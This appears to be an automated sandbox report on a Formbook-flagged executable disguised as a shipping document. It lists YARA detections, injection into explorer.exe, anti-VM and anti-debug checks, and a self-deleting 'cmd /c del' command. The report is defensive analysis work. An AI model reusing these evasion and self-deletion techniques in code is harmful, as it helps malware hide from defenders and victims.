          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040473E
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nseA920.tmpJump to behavior
          Source: SHIPPING DOCUMENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SHIPPING DOCUMENT.exeVirustotal: Detection: 34%
          Source: SHIPPING DOCUMENT.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile read: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: SHIPPING DOCUMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeUnpacked PE file: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041E560 push ss; ret 1_2_0041E569
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B1D0D1 push ecx; ret 1_2_00B1D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0391D0D1 push ecx; ret 8_2_0391D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCEB5 push eax; ret 8_2_02DDCF08
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF6C push eax; ret 8_2_02DDCF72
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF0B push eax; ret 8_2_02DDCF72
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF02 push eax; ret 8_2_02DDCF08
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDE560 push ss; ret 8_2_02DDE569
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002DC98E4 second address: 0000000002DC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002DC9B5E second address: 0000000002DC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 5192Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5192Thread sleep time: -76000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6944Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680284032.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.926975780.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680284032.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.924340020.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.680488183.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]0_2_10001000
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_022B182F mov eax, dword ptr fs:[00000030h]0_2_022B182F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_022B1617 mov eax, dword ptr fs:[00000030h]0_2_022B1617
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]1_2_00B090AF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]1_2_00AC9080
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]1_2_00B43884
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]1_2_00B43884
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]1_2_00AC58EC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]1_2_00B94015
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]1_2_00B94015
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]1_2_00B82073
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]1_2_00B91074
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]1_2_00AE0050
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]1_2_00AE0050
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]1_2_00AF61A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]1_2_00AF61A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]1_2_00B469A6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]1_2_00AFA185
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]1_2_00AEC182
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]1_2_00AF2990
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]1_2_00B541E8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]1_2_00AF513A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]1_2_00AF513A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]1_2_00ACC962
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]1_2_00ACB171
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]1_2_00ACB171
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]1_2_00AEB944
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]1_2_00AEB944
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ADAAB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ADAAB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]1_2_00AFFAB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]1_2_00AFD294
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]1_2_00AFD294
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AF2AE4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]1_2_00AF2ACB
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]1_2_00B04A2C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]1_2_00B04A2C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]1_2_00AD8A0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]1_2_00AE3A1C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
